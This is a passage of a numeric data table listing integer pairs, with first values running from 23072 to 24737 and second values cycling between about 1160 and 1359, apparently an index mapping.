(23072, 1223),
(23073, 1223),
(23074, 1223),
(23075, 1224),
(23076, 1224),
(23077, 1224),
(23078, 1224),
(23079, 1224),
(23080, 1224),
(23081, 1224),
(23082, 1225),
(23083, 1225),
(23084, 1225),
(23085, 1225),
(23086, 1225),
(23087, 1225),
(23088, 1225),
(23089, 1226),
(23090, 1226),
(23091, 1226),
(23092, 1226),
(23093, 1226),
(23094, 1226),
(23095, 1226),
(23096, 1227),
(23097, 1227),
(23098, 1227),
(23099, 1227),
(23100, 1227),
(23101, 1227),
(23102, 1227),
(23103, 1228),
(23104, 1228),
(23105, 1228),
(23106, 1228),
(23107, 1228),
(23108, 1228),
(23109, 1228),
(23110, 1229),
(23111, 1229),
(23112, 1229),
(23113, 1229),
(23114, 1229),
(23115, 1229),
(23116, 1229),
(23117, 1230),
(23118, 1230),
(23119, 1230),
(23120, 1230),
(23121, 1230),
(23122, 1230),
(23123, 1230),
(23124, 1231),
(23125, 1231),
(23126, 1231),
(23127, 1231),
(23128, 1231),
(23129, 1231),
(23130, 1231),
(23131, 1232),
(23132, 1232),
(23133, 1232),
(23134, 1232),
(23135, 1232),
(23136, 1232),
(23137, 1232),
(23138, 1233),
(23139, 1233),
(23140, 1233),
(23141, 1233),
(23142, 1233),
(23143, 1233),
(23144, 1233),
(23145, 1233),
(23146, 1233),
(23147, 1233),
(23148, 1233),
(23149, 1234),
(23150, 1234),
(23151, 1234),
(23152, 1234),
(23153, 1234),
(23154, 1234),
(23155, 1234),
(23156, 1235),
(23157, 1235),
(23158, 1235),
(23159, 1235),
(23160, 1235),
(23161, 1235),
(23162, 1235),
(23163, 1236),
(23164, 1236),
(23165, 1236),
(23166, 1236),
(23167, 1236),
(23168, 1236),
(23169, 1236),
(23170, 1237),
(23171, 1237),
(23172, 1237),
(23173, 1237),
(23174, 1237),
(23175, 1237),
(23176, 1237),
(23177, 1238),
(23178, 1238),
(23179, 1238),
(23180, 1238),
(23181, 1238),
(23182, 1238),
(23183, 1238),
(23184, 1239),
(23185, 1239),
(23186, 1239),
(23187, 1239),
(23188, 1239),
(23189, 1239),
(23190, 1239),
(23191, 1240),
(23192, 1240),
(23193, 1240),
(23194, 1240),
(23195, 1240),
(23196, 1240),
(23197, 1240),
(23198, 1241),
(23199, 1241),
(23200, 1241),
(23201, 1241),
(23202, 1241),
(23203, 1241),
(23204, 1241),
(23205, 1242),
(23206, 1242),
(23207, 1242),
(23208, 1242),
(23209, 1242),
(23210, 1242),
(23211, 1242),
(23212, 1243),
(23213, 1243),
(23214, 1243),
(23215, 1243),
(23216, 1243),
(23217, 1243),
(23218, 1243),
(23219, 1244),
(23220, 1244),
(23221, 1244),
(23222, 1244),
(23223, 1244),
(23224, 1244),
(23225, 1244),
(23226, 1245),
(23227, 1245),
(23228, 1245),
(23229, 1245),
(23230, 1245),
(23231, 1245),
(23232, 1245),
(23233, 1246),
(23234, 1246),
(23235, 1246),
(23236, 1246),
(23237, 1246),
(23238, 1246),
(23239, 1246),
(23240, 1247),
(23241, 1247),
(23242, 1247),
(23243, 1247),
(23244, 1247),
(23245, 1247),
(23246, 1247),
(23247, 1248),
(23248, 1248),
(23249, 1248),
(23250, 1248),
(23251, 1248),
(23252, 1248),
(23253, 1248),
(23254, 1249),
(23255, 1249),
(23256, 1249),
(23257, 1249),
(23258, 1249),
(23259, 1249),
(23260, 1249),
(23261, 1249),
(23262, 1249),
(23263, 1249),
(23264, 1249),
(23265, 1250),
(23266, 1250),
(23267, 1250),
(23268, 1250),
(23269, 1250),
(23270, 1250),
(23271, 1250),
(23272, 1251),
(23273, 1251),
(23274, 1251),
(23275, 1251),
(23276, 1251),
(23277, 1251),
(23278, 1251),
(23279, 1252),
(23280, 1252),
(23281, 1252),
(23282, 1252),
(23283, 1252),
(23284, 1252),
(23285, 1252),
(23286, 1253),
(23287, 1253),
(23288, 1253),
(23289, 1253),
(23290, 1253),
(23291, 1253),
(23292, 1253),
(23293, 1254),
(23294, 1254),
(23295, 1254),
(23296, 1254),
(23297, 1254),
(23298, 1254),
(23299, 1254),
(23300, 1255),
(23301, 1255),
(23302, 1255),
(23303, 1255),
(23304, 1255),
(23305, 1255),
(23306, 1255),
(23307, 1256),
(23308, 1256),
(23309, 1256),
(23310, 1256),
(23311, 1256),
(23312, 1256),
(23313, 1256),
(23314, 1257),
(23315, 1257),
(23316, 1257),
(23317, 1257),
(23318, 1257),
(23319, 1257),
(23320, 1257),
(23321, 1258),
(23322, 1258),
(23323, 1258),
(23324, 1258),
(23325, 1258),
(23326, 1258),
(23327, 1258),
(23328, 1259),
(23329, 1259),
(23330, 1259),
(23331, 1259),
(23332, 1259),
(23333, 1259),
(23334, 1259),
(23335, 1160),
(23336, 1161),
(23337, 1162),
(23338, 1163),
(23339, 1164),
(23340, 1165),
(23341, 1166),
(23342, 1167),
(23343, 1168),
(23344, 1169),
(23345, 1170),
(23346, 1171),
(23347, 1172),
(23348, 1173),
(23349, 1174),
(23350, 1175),
(23351, 1176),
(23352, 1177),
(23353, 1178),
(23354, 1179),
(23355, 1180),
(23356, 1181),
(23357, 1182),
(23358, 1183),
(23359, 1184),
(23360, 1185),
(23361, 1186),
(23362, 1187),
(23363, 1188),
(23364, 1189),
(23365, 1190),
(23366, 1191),
(23367, 1192),
(23368, 1193),
(23369, 1194),
(23370, 1195),
(23371, 1196),
(23372, 1197),
(23373, 1198),
(23374, 1199),
(23375, 1200),
(23376, 1201),
(23377, 1202),
(23378, 1203),
(23379, 1204),
(23380, 1205),
(23381, 1206),
(23382, 1207),
(23383, 1208),
(23384, 1209),
(23385, 1210),
(23386, 1211),
(23387, 1212),
(23388, 1213),
(23389, 1214),
(23390, 1215),
(23391, 1216),
(23392, 1217),
(23393, 1218),
(23394, 1219),
(23395, 1220),
(23396, 1221),
(23397, 1222),
(23398, 1223),
(23399, 1224),
(23400, 1225),
(23401, 1226),
(23402, 1227),
(23403, 1228),
(23404, 1229),
(23405, 1230),
(23406, 1231),
(23407, 1232),
(23408, 1233),
(23409, 1234),
(23410, 1235),
(23411, 1236),
(23412, 1237),
(23413, 1238),
(23414, 1239),
(23415, 1240),
(23416, 1241),
(23417, 1242),
(23418, 1243),
(23419, 1244),
(23420, 1245),
(23421, 1246),
(23422, 1247),
(23423, 1248),
(23424, 1249),
(23425, 1250),
(23426, 1251),
(23427, 1252),
(23428, 1253),
(23429, 1254),
(23430, 1255),
(23431, 1256),
(23432, 1257),
(23433, 1258),
(23434, 1259),
(23435, 1160),
(23436, 1160),
(23437, 1160),
(23438, 1160),
(23439, 1160),
(23440, 1160),
(23441, 1161),
(23442, 1161),
(23443, 1161),
(23444, 1161),
(23445, 1161),
(23446, 1161),
(23447, 1162),
(23448, 1162),
(23449, 1162),
(23450, 1162),
(23451, 1162),
(23452, 1162),
(23453, 1163),
(23454, 1163),
(23455, 1163),
(23456, 1163),
(23457, 1163),
(23458, 1163),
(23459, 1164),
(23460, 1164),
(23461, 1164),
(23462, 1164),
(23463, 1164),
(23464, 1164),
(23465, 1165),
(23466, 1165),
(23467, 1165),
(23468, 1165),
(23469, 1165),
(23470, 1165),
(23471, 1166),
(23472, 1166),
(23473, 1166),
(23474, 1166),
(23475, 1166),
(23476, 1166),
(23477, 1167),
(23478, 1167),
(23479, 1167),
(23480, 1167),
(23481, 1167),
(23482, 1167),
(23483, 1168),
(23484, 1168),
(23485, 1168),
(23486, 1168),
(23487, 1168),
(23488, 1168),
(23489, 1169),
(23490, 1169),
(23491, 1169),
(23492, 1169),
(23493, 1169),
(23494, 1169),
(23495, 1170),
(23496, 1170),
(23497, 1170),
(23498, 1170),
(23499, 1170),
(23500, 1170),
(23501, 1171),
(23502, 1171),
(23503, 1171),
(23504, 1171),
(23505, 1171),
(23506, 1171),
(23507, 1172),
(23508, 1172),
(23509, 1172),
(23510, 1172),
(23511, 1172),
(23512, 1172),
(23513, 1173),
(23514, 1173),
(23515, 1173),
(23516, 1173),
(23517, 1173),
(23518, 1173),
(23519, 1174),
(23520, 1174),
(23521, 1174),
(23522, 1174),
(23523, 1174),
(23524, 1174),
(23525, 1175),
(23526, 1175),
(23527, 1175),
(23528, 1175),
(23529, 1175),
(23530, 1175),
(23531, 1175),
(23532, 1175),
(23533, 1175),
(23534, 1176),
(23535, 1176),
(23536, 1176),
(23537, 1176),
(23538, 1176),
(23539, 1176),
(23540, 1177),
(23541, 1177),
(23542, 1177),
(23543, 1177),
(23544, 1177),
(23545, 1177),
(23546, 1178),
(23547, 1178),
(23548, 1178),
(23549, 1178),
(23550, 1178),
(23551, 1178),
(23552, 1179),
(23553, 1179),
(23554, 1179),
(23555, 1179),
(23556, 1179),
(23557, 1179),
(23558, 1180),
(23559, 1180),
(23560, 1180),
(23561, 1180),
(23562, 1180),
(23563, 1180),
(23564, 1181),
(23565, 1181),
(23566, 1181),
(23567, 1181),
(23568, 1181),
(23569, 1181),
(23570, 1182),
(23571, 1182),
(23572, 1182),
(23573, 1182),
(23574, 1182),
(23575, 1182),
(23576, 1183),
(23577, 1183),
(23578, 1183),
(23579, 1183),
(23580, 1183),
(23581, 1183),
(23582, 1184),
(23583, 1184),
(23584, 1184),
(23585, 1184),
(23586, 1184),
(23587, 1184),
(23588, 1185),
(23589, 1185),
(23590, 1185),
(23591, 1185),
(23592, 1185),
(23593, 1185),
(23594, 1186),
(23595, 1186),
(23596, 1186),
(23597, 1186),
(23598, 1186),
(23599, 1186),
(23600, 1187),
(23601, 1187),
(23602, 1187),
(23603, 1187),
(23604, 1187),
(23605, 1187),
(23606, 1188),
(23607, 1188),
(23608, 1188),
(23609, 1188),
(23610, 1188),
(23611, 1188),
(23612, 1189),
(23613, 1189),
(23614, 1189),
(23615, 1189),
(23616, 1189),
(23617, 1189),
(23618, 1190),
(23619, 1190),
(23620, 1190),
(23621, 1190),
(23622, 1190),
(23623, 1190),
(23624, 1191),
(23625, 1191),
(23626, 1191),
(23627, 1191),
(23628, 1191),
(23629, 1191),
(23630, 1191),
(23631, 1191),
(23632, 1191),
(23633, 1192),
(23634, 1192),
(23635, 1192),
(23636, 1192),
(23637, 1192),
(23638, 1192),
(23639, 1193),
(23640, 1193),
(23641, 1193),
(23642, 1193),
(23643, 1193),
(23644, 1193),
(23645, 1194),
(23646, 1194),
(23647, 1194),
(23648, 1194),
(23649, 1194),
(23650, 1194),
(23651, 1195),
(23652, 1195),
(23653, 1195),
(23654, 1195),
(23655, 1195),
(23656, 1195),
(23657, 1196),
(23658, 1196),
(23659, 1196),
(23660, 1196),
(23661, 1196),
(23662, 1196),
(23663, 1197),
(23664, 1197),
(23665, 1197),
(23666, 1197),
(23667, 1197),
(23668, 1197),
(23669, 1198),
(23670, 1198),
(23671, 1198),
(23672, 1198),
(23673, 1198),
(23674, 1198),
(23675, 1199),
(23676, 1199),
(23677, 1199),
(23678, 1199),
(23679, 1199),
(23680, 1199),
(23681, 1200),
(23682, 1200),
(23683, 1200),
(23684, 1200),
(23685, 1200),
(23686, 1200),
(23687, 1201),
(23688, 1201),
(23689, 1201),
(23690, 1201),
(23691, 1201),
(23692, 1201),
(23693, 1202),
(23694, 1202),
(23695, 1202),
(23696, 1202),
(23697, 1202),
(23698, 1202),
(23699, 1203),
(23700, 1203),
(23701, 1203),
(23702, 1203),
(23703, 1203),
(23704, 1203),
(23705, 1204),
(23706, 1204),
(23707, 1204),
(23708, 1204),
(23709, 1204),
(23710, 1204),
(23711, 1205),
(23712, 1205),
(23713, 1205),
(23714, 1205),
(23715, 1205),
(23716, 1205),
(23717, 1206),
(23718, 1206),
(23719, 1206),
(23720, 1206),
(23721, 1206),
(23722, 1206),
(23723, 1207),
(23724, 1207),
(23725, 1207),
(23726, 1207),
(23727, 1207),
(23728, 1207),
(23729, 1207),
(23730, 1207),
(23731, 1207),
(23732, 1208),
(23733, 1208),
(23734, 1208),
(23735, 1208),
(23736, 1208),
(23737, 1208),
(23738, 1209),
(23739, 1209),
(23740, 1209),
(23741, 1209),
(23742, 1209),
(23743, 1209),
(23744, 1210),
(23745, 1210),
(23746, 1210),
(23747, 1210),
(23748, 1210),
(23749, 1210),
(23750, 1211),
(23751, 1211),
(23752, 1211),
(23753, 1211),
(23754, 1211),
(23755, 1211),
(23756, 1212),
(23757, 1212),
(23758, 1212),
(23759, 1212),
(23760, 1212),
(23761, 1212),
(23762, 1213),
(23763, 1213),
(23764, 1213),
(23765, 1213),
(23766, 1213),
(23767, 1213),
(23768, 1214),
(23769, 1214),
(23770, 1214),
(23771, 1214),
(23772, 1214),
(23773, 1214),
(23774, 1215),
(23775, 1215),
(23776, 1215),
(23777, 1215),
(23778, 1215),
(23779, 1215),
(23780, 1216),
(23781, 1216),
(23782, 1216),
(23783, 1216),
(23784, 1216),
(23785, 1216),
(23786, 1217),
(23787, 1217),
(23788, 1217),
(23789, 1217),
(23790, 1217),
(23791, 1217),
(23792, 1218),
(23793, 1218),
(23794, 1218),
(23795, 1218),
(23796, 1218),
(23797, 1218),
(23798, 1219),
(23799, 1219),
(23800, 1219),
(23801, 1219),
(23802, 1219),
(23803, 1219),
(23804, 1220),
(23805, 1220),
(23806, 1220),
(23807, 1220),
(23808, 1220),
(23809, 1220),
(23810, 1221),
(23811, 1221),
(23812, 1221),
(23813, 1221),
(23814, 1221),
(23815, 1221),
(23816, 1222),
(23817, 1222),
(23818, 1222),
(23819, 1222),
(23820, 1222),
(23821, 1222),
(23822, 1223),
(23823, 1223),
(23824, 1223),
(23825, 1223),
(23826, 1223),
(23827, 1223),
(23828, 1223),
(23829, 1223),
(23830, 1223),
(23831, 1224),
(23832, 1224),
(23833, 1224),
(23834, 1224),
(23835, 1224),
(23836, 1224),
(23837, 1225),
(23838, 1225),
(23839, 1225),
(23840, 1225),
(23841, 1225),
(23842, 1225),
(23843, 1226),
(23844, 1226),
(23845, 1226),
(23846, 1226),
(23847, 1226),
(23848, 1226),
(23849, 1227),
(23850, 1227),
(23851, 1227),
(23852, 1227),
(23853, 1227),
(23854, 1227),
(23855, 1228),
(23856, 1228),
(23857, 1228),
(23858, 1228),
(23859, 1228),
(23860, 1228),
(23861, 1229),
(23862, 1229),
(23863, 1229),
(23864, 1229),
(23865, 1229),
(23866, 1229),
(23867, 1230),
(23868, 1230),
(23869, 1230),
(23870, 1230),
(23871, 1230),
(23872, 1230),
(23873, 1231),
(23874, 1231),
(23875, 1231),
(23876, 1231),
(23877, 1231),
(23878, 1231),
(23879, 1232),
(23880, 1232),
(23881, 1232),
(23882, 1232),
(23883, 1232),
(23884, 1232),
(23885, 1233),
(23886, 1233),
(23887, 1233),
(23888, 1233),
(23889, 1233),
(23890, 1233),
(23891, 1233),
(23892, 1233),
(23893, 1233),
(23894, 1234),
(23895, 1234),
(23896, 1234),
(23897, 1234),
(23898, 1234),
(23899, 1234),
(23900, 1235),
(23901, 1235),
(23902, 1235),
(23903, 1235),
(23904, 1235),
(23905, 1235),
(23906, 1236),
(23907, 1236),
(23908, 1236),
(23909, 1236),
(23910, 1236),
(23911, 1236),
(23912, 1237),
(23913, 1237),
(23914, 1237),
(23915, 1237),
(23916, 1237),
(23917, 1237),
(23918, 1238),
(23919, 1238),
(23920, 1238),
(23921, 1238),
(23922, 1238),
(23923, 1238),
(23924, 1239),
(23925, 1239),
(23926, 1239),
(23927, 1239),
(23928, 1239),
(23929, 1239),
(23930, 1240),
(23931, 1240),
(23932, 1240),
(23933, 1240),
(23934, 1240),
(23935, 1240),
(23936, 1241),
(23937, 1241),
(23938, 1241),
(23939, 1241),
(23940, 1241),
(23941, 1241),
(23942, 1242),
(23943, 1242),
(23944, 1242),
(23945, 1242),
(23946, 1242),
(23947, 1242),
(23948, 1243),
(23949, 1243),
(23950, 1243),
(23951, 1243),
(23952, 1243),
(23953, 1243),
(23954, 1244),
(23955, 1244),
(23956, 1244),
(23957, 1244),
(23958, 1244),
(23959, 1244),
(23960, 1245),
(23961, 1245),
(23962, 1245),
(23963, 1245),
(23964, 1245),
(23965, 1245),
(23966, 1246),
(23967, 1246),
(23968, 1246),
(23969, 1246),
(23970, 1246),
(23971, 1246),
(23972, 1247),
(23973, 1247),
(23974, 1247),
(23975, 1247),
(23976, 1247),
(23977, 1247),
(23978, 1248),
(23979, 1248),
(23980, 1248),
(23981, 1248),
(23982, 1248),
(23983, 1248),
(23984, 1249),
(23985, 1249),
(23986, 1249),
(23987, 1249),
(23988, 1249),
(23989, 1249),
(23990, 1249),
(23991, 1249),
(23992, 1249),
(23993, 1250),
(23994, 1250),
(23995, 1250),
(23996, 1250),
(23997, 1250),
(23998, 1250),
(23999, 1251),
(24000, 1251),
(24001, 1251),
(24002, 1251),
(24003, 1251),
(24004, 1251),
(24005, 1252),
(24006, 1252),
(24007, 1252),
(24008, 1252),
(24009, 1252),
(24010, 1252),
(24011, 1253),
(24012, 1253),
(24013, 1253),
(24014, 1253),
(24015, 1253),
(24016, 1253),
(24017, 1254),
(24018, 1254),
(24019, 1254),
(24020, 1254),
(24021, 1254),
(24022, 1254),
(24023, 1255),
(24024, 1255),
(24025, 1255),
(24026, 1255),
(24027, 1255),
(24028, 1255),
(24029, 1256),
(24030, 1256),
(24031, 1256),
(24032, 1256),
(24033, 1256),
(24034, 1256),
(24035, 1257),
(24036, 1257),
(24037, 1257),
(24038, 1257),
(24039, 1257),
(24040, 1257),
(24041, 1258),
(24042, 1258),
(24043, 1258),
(24044, 1258),
(24045, 1258),
(24046, 1258),
(24047, 1259),
(24048, 1259),
(24049, 1259),
(24050, 1259),
(24051, 1259),
(24052, 1259),
(24053, 1160),
(24054, 1160),
(24055, 1161),
(24056, 1161),
(24057, 1162),
(24058, 1162),
(24059, 1163),
(24060, 1163),
(24061, 1164),
(24062, 1164),
(24063, 1165),
(24064, 1165),
(24065, 1166),
(24066, 1166),
(24067, 1167),
(24068, 1167),
(24069, 1168),
(24070, 1168),
(24071, 1169),
(24072, 1169),
(24073, 1170),
(24074, 1170),
(24075, 1171),
(24076, 1171),
(24077, 1172),
(24078, 1172),
(24079, 1173),
(24080, 1173),
(24081, 1174),
(24082, 1174),
(24083, 1175),
(24084, 1176),
(24085, 1176),
(24086, 1177),
(24087, 1177),
(24088, 1178),
(24089, 1178),
(24090, 1179),
(24091, 1179),
(24092, 1180),
(24093, 1180),
(24094, 1181),
(24095, 1181),
(24096, 1182),
(24097, 1182),
(24098, 1183),
(24099, 1183),
(24100, 1184),
(24101, 1184),
(24102, 1185),
(24103, 1185),
(24104, 1186),
(24105, 1186),
(24106, 1187),
(24107, 1187),
(24108, 1188),
(24109, 1188),
(24110, 1189),
(24111, 1189),
(24112, 1190),
(24113, 1190),
(24114, 1191),
(24115, 1192),
(24116, 1192),
(24117, 1193),
(24118, 1193),
(24119, 1194),
(24120, 1194),
(24121, 1195),
(24122, 1195),
(24123, 1196),
(24124, 1196),
(24125, 1197),
(24126, 1197),
(24127, 1198),
(24128, 1198),
(24129, 1199),
(24130, 1199),
(24131, 1200),
(24132, 1200),
(24133, 1201),
(24134, 1201),
(24135, 1202),
(24136, 1202),
(24137, 1203),
(24138, 1203),
(24139, 1204),
(24140, 1204),
(24141, 1205),
(24142, 1205),
(24143, 1206),
(24144, 1206),
(24145, 1207),
(24146, 1208),
(24147, 1208),
(24148, 1209),
(24149, 1209),
(24150, 1210),
(24151, 1210),
(24152, 1211),
(24153, 1211),
(24154, 1212),
(24155, 1212),
(24156, 1213),
(24157, 1213),
(24158, 1214),
(24159, 1214),
(24160, 1215),
(24161, 1215),
(24162, 1216),
(24163, 1216),
(24164, 1217),
(24165, 1217),
(24166, 1218),
(24167, 1218),
(24168, 1219),
(24169, 1219),
(24170, 1220),
(24171, 1220),
(24172, 1221),
(24173, 1221),
(24174, 1222),
(24175, 1222),
(24176, 1223),
(24177, 1224),
(24178, 1224),
(24179, 1225),
(24180, 1225),
(24181, 1226),
(24182, 1226),
(24183, 1227),
(24184, 1227),
(24185, 1228),
(24186, 1228),
(24187, 1229),
(24188, 1229),
(24189, 1230),
(24190, 1230),
(24191, 1231),
(24192, 1231),
(24193, 1232),
(24194, 1232),
(24195, 1233),
(24196, 1234),
(24197, 1234),
(24198, 1235),
(24199, 1235),
(24200, 1236),
(24201, 1236),
(24202, 1237),
(24203, 1237),
(24204, 1238),
(24205, 1238),
(24206, 1239),
(24207, 1239),
(24208, 1240),
(24209, 1240),
(24210, 1241),
(24211, 1241),
(24212, 1242),
(24213, 1242),
(24214, 1243),
(24215, 1243),
(24216, 1244),
(24217, 1244),
(24218, 1245),
(24219, 1245),
(24220, 1246),
(24221, 1246),
(24222, 1247),
(24223, 1247),
(24224, 1248),
(24225, 1248),
(24226, 1249),
(24227, 1250),
(24228, 1250),
(24229, 1251),
(24230, 1251),
(24231, 1252),
(24232, 1252),
(24233, 1253),
(24234, 1253),
(24235, 1254),
(24236, 1254),
(24237, 1255),
(24238, 1255),
(24239, 1256),
(24240, 1256),
(24241, 1257),
(24242, 1257),
(24243, 1258),
(24244, 1258),
(24245, 1259),
(24246, 1259),
(24247, 1260),
(24248, 1261),
(24249, 1262),
(24250, 1263),
(24251, 1264),
(24252, 1265),
(24253, 1266),
(24254, 1267),
(24255, 1268),
(24256, 1269),
(24257, 1270),
(24258, 1271),
(24259, 1272),
(24260, 1273),
(24261, 1274),
(24262, 1275),
(24263, 1276),
(24264, 1277),
(24265, 1278),
(24266, 1279),
(24267, 1280),
(24268, 1281),
(24269, 1282),
(24270, 1283),
(24271, 1284),
(24272, 1285),
(24273, 1286),
(24274, 1287),
(24275, 1288),
(24276, 1289),
(24277, 1290),
(24278, 1291),
(24279, 1292),
(24280, 1293),
(24281, 1294),
(24282, 1295),
(24283, 1296),
(24284, 1297),
(24285, 1298),
(24286, 1299),
(24287, 1300),
(24288, 1301),
(24289, 1302),
(24290, 1303),
(24291, 1304),
(24292, 1305),
(24293, 1306),
(24294, 1307),
(24295, 1308),
(24296, 1309),
(24297, 1310),
(24298, 1311),
(24299, 1312),
(24300, 1313),
(24301, 1314),
(24302, 1315),
(24303, 1316),
(24304, 1317),
(24305, 1318),
(24306, 1319),
(24307, 1320),
(24308, 1321),
(24309, 1322),
(24310, 1323),
(24311, 1324),
(24312, 1325),
(24313, 1326),
(24314, 1327),
(24315, 1328),
(24316, 1329),
(24317, 1330),
(24318, 1331),
(24319, 1332),
(24320, 1333),
(24321, 1334),
(24322, 1335),
(24323, 1336),
(24324, 1337),
(24325, 1338),
(24326, 1339),
(24327, 1340),
(24328, 1341),
(24329, 1342),
(24330, 1343),
(24331, 1344),
(24332, 1345),
(24333, 1346),
(24334, 1347),
(24335, 1348),
(24336, 1349),
(24337, 1350),
(24338, 1351),
(24339, 1352),
(24340, 1353),
(24341, 1354),
(24342, 1355),
(24343, 1356),
(24344, 1357),
(24345, 1358),
(24346, 1359),
(24347, 1260),
(24348, 1261),
(24349, 1261),
(24350, 1261),
(24351, 1262),
(24352, 1263),
(24353, 1264),
(24354, 1264),
(24355, 1264),
(24356, 1265),
(24357, 1265),
(24358, 1265),
(24359, 1266),
(24360, 1267),
(24361, 1268),
(24362, 1268),
(24363, 1268),
(24364, 1268),
(24365, 1269),
(24366, 1270),
(24367, 1271),
(24368, 1271),
(24369, 1271),
(24370, 1271),
(24371, 1272),
(24372, 1273),
(24373, 1274),
(24374, 1274),
(24375, 1274),
(24376, 1274),
(24377, 1275),
(24378, 1276),
(24379, 1277),
(24380, 1277),
(24381, 1277),
(24382, 1277),
(24383, 1278),
(24384, 1279),
(24385, 1280),
(24386, 1280),
(24387, 1280),
(24388, 1280),
(24389, 1281),
(24390, 1281),
(24391, 1281),
(24392, 1281),
(24393, 1282),
(24394, 1282),
(24395, 1282),
(24396, 1283),
(24397, 1284),
(24398, 1285),
(24399, 1285),
(24400, 1285),
(24401, 1286),
(24402, 1287),
(24403, 1288),
(24404, 1288),
(24405, 1288),
(24406, 1289),
(24407, 1290),
(24408, 1291),
(24409, 1291),
(24410, 1291),
(24411, 1292),
(24412, 1293),
(24413, 1294),
(24414, 1294),
(24415, 1294),
(24416, 1295),
(24417, 1296),
(24418, 1297),
(24419, 1297),
(24420, 1297),
(24421, 1298),
(24422, 1299),
(24423, 1299),
(24424, 1299),
(24425, 1300),
(24426, 1301),
(24427, 1302),
(24428, 1302),
(24429, 1302),
(24430, 1303),
(24431, 1304),
(24432, 1305),
(24433, 1305),
(24434, 1305),
(24435, 1306),
(24436, 1307),
(24437, 1308),
(24438, 1308),
(24439, 1308),
(24440, 1309),
(24441, 1310),
(24442, 1311),
(24443, 1311),
(24444, 1311),
(24445, 1312),
(24446, 1313),
(24447, 1313),
(24448, 1313),
(24449, 1314),
(24450, 1314),
(24451, 1314),
(24452, 1314),
(24453, 1315),
(24454, 1316),
(24455, 1317),
(24456, 1317),
(24457, 1317),
(24458, 1317),
(24459, 1318),
(24460, 1319),
(24461, 1320),
(24462, 1320),
(24463, 1320),
(24464, 1320),
(24465, 1321),
(24466, 1322),
(24467, 1323),
(24468, 1323),
(24469, 1323),
(24470, 1323),
(24471, 1324),
(24472, 1325),
(24473, 1326),
(24474, 1326),
(24475, 1326),
(24476, 1326),
(24477, 1327),
(24478, 1328),
(24479, 1329),
(24480, 1329),
(24481, 1329),
(24482, 1329),
(24483, 1330),
(24484, 1331),
(24485, 1332),
(24486, 1332),
(24487, 1332),
(24488, 1333),
(24489, 1334),
(24490, 1335),
(24491, 1335),
(24492, 1335),
(24493, 1336),
(24494, 1337),
(24495, 1338),
(24496, 1338),
(24497, 1338),
(24498, 1339),
(24499, 1340),
(24500, 1341),
(24501, 1341),
(24502, 1341),
(24503, 1342),
(24504, 1343),
(24505, 1344),
(24506, 1344),
(24507, 1344),
(24508, 1345),
(24509, 1345),
(24510, 1345),
(24511, 1346),
(24512, 1347),
(24513, 1348),
(24514, 1348),
(24515, 1348),
(24516, 1349),
(24517, 1350),
(24518, 1351),
(24519, 1351),
(24520, 1351),
(24521, 1352),
(24522, 1353),
(24523, 1354),
(24524, 1354),
(24525, 1354),
(24526, 1355),
(24527, 1356),
(24528, 1357),
(24529, 1357),
(24530, 1357),
(24531, 1358),
(24532, 1359),
(24533, 1260),
(24534, 1260),
(24535, 1260),
(24536, 1260),
(24537, 1260),
(24538, 1260),
(24539, 1260),
(24540, 1261),
(24541, 1261),
(24542, 1261),
(24543, 1261),
(24544, 1261),
(24545, 1261),
(24546, 1261),
(24547, 1262),
(24548, 1262),
(24549, 1262),
(24550, 1262),
(24551, 1262),
(24552, 1262),
(24553, 1262),
(24554, 1263),
(24555, 1263),
(24556, 1263),
(24557, 1263),
(24558, 1263),
(24559, 1263),
(24560, 1263),
(24561, 1264),
(24562, 1264),
(24563, 1264),
(24564, 1264),
(24565, 1264),
(24566, 1264),
(24567, 1264),
(24568, 1265),
(24569, 1265),
(24570, 1265),
(24571, 1265),
(24572, 1265),
(24573, 1265),
(24574, 1265),
(24575, 1265),
(24576, 1265),
(24577, 1265),
(24578, 1265),
(24579, 1266),
(24580, 1266),
(24581, 1266),
(24582, 1266),
(24583, 1266),
(24584, 1266),
(24585, 1266),
(24586, 1267),
(24587, 1267),
(24588, 1267),
(24589, 1267),
(24590, 1267),
(24591, 1267),
(24592, 1267),
(24593, 1268),
(24594, 1268),
(24595, 1268),
(24596, 1268),
(24597, 1268),
(24598, 1268),
(24599, 1268),
(24600, 1269),
(24601, 1269),
(24602, 1269),
(24603, 1269),
(24604, 1269),
(24605, 1269),
(24606, 1269),
(24607, 1270),
(24608, 1270),
(24609, 1270),
(24610, 1270),
(24611, 1270),
(24612, 1270),
(24613, 1270),
(24614, 1271),
(24615, 1271),
(24616, 1271),
(24617, 1271),
(24618, 1271),
(24619, 1271),
(24620, 1271),
(24621, 1272),
(24622, 1272),
(24623, 1272),
(24624, 1272),
(24625, 1272),
(24626, 1272),
(24627, 1272),
(24628, 1273),
(24629, 1273),
(24630, 1273),
(24631, 1273),
(24632, 1273),
(24633, 1273),
(24634, 1273),
(24635, 1274),
(24636, 1274),
(24637, 1274),
(24638, 1274),
(24639, 1274),
(24640, 1274),
(24641, 1274),
(24642, 1275),
(24643, 1275),
(24644, 1275),
(24645, 1275),
(24646, 1275),
(24647, 1275),
(24648, 1275),
(24649, 1276),
(24650, 1276),
(24651, 1276),
(24652, 1276),
(24653, 1276),
(24654, 1276),
(24655, 1276),
(24656, 1277),
(24657, 1277),
(24658, 1277),
(24659, 1277),
(24660, 1277),
(24661, 1277),
(24662, 1277),
(24663, 1278),
(24664, 1278),
(24665, 1278),
(24666, 1278),
(24667, 1278),
(24668, 1278),
(24669, 1278),
(24670, 1279),
(24671, 1279),
(24672, 1279),
(24673, 1279),
(24674, 1279),
(24675, 1279),
(24676, 1279),
(24677, 1280),
(24678, 1280),
(24679, 1280),
(24680, 1280),
(24681, 1280),
(24682, 1280),
(24683, 1280),
(24684, 1281),
(24685, 1281),
(24686, 1281),
(24687, 1281),
(24688, 1281),
(24689, 1281),
(24690, 1281),
(24691, 1281),
(24692, 1281),
(24693, 1281),
(24694, 1281),
(24695, 1282),
(24696, 1282),
(24697, 1282),
(24698, 1282),
(24699, 1282),
(24700, 1282),
(24701, 1282),
(24702, 1283),
(24703, 1283),
(24704, 1283),
(24705, 1283),
(24706, 1283),
(24707, 1283),
(24708, 1283),
(24709, 1284),
(24710, 1284),
(24711, 1284),
(24712, 1284),
(24713, 1284),
(24714, 1284),
(24715, 1284),
(24716, 1285),
(24717, 1285),
(24718, 1285),
(24719, 1285),
(24720, 1285),
(24721, 1285),
(24722, 1285),
(24723, 1286),
(24724, 1286),
(24725, 1286),
(24726, 1286),
(24727, 1286),
(24728, 1286),
(24729, 1286),
(24730, 1287),
(24731, 1287),
(24732, 1287),
(24733, 1287),
(24734, 1287),
(24735, 1287),
(24736, 1287),
(24737, 1288),
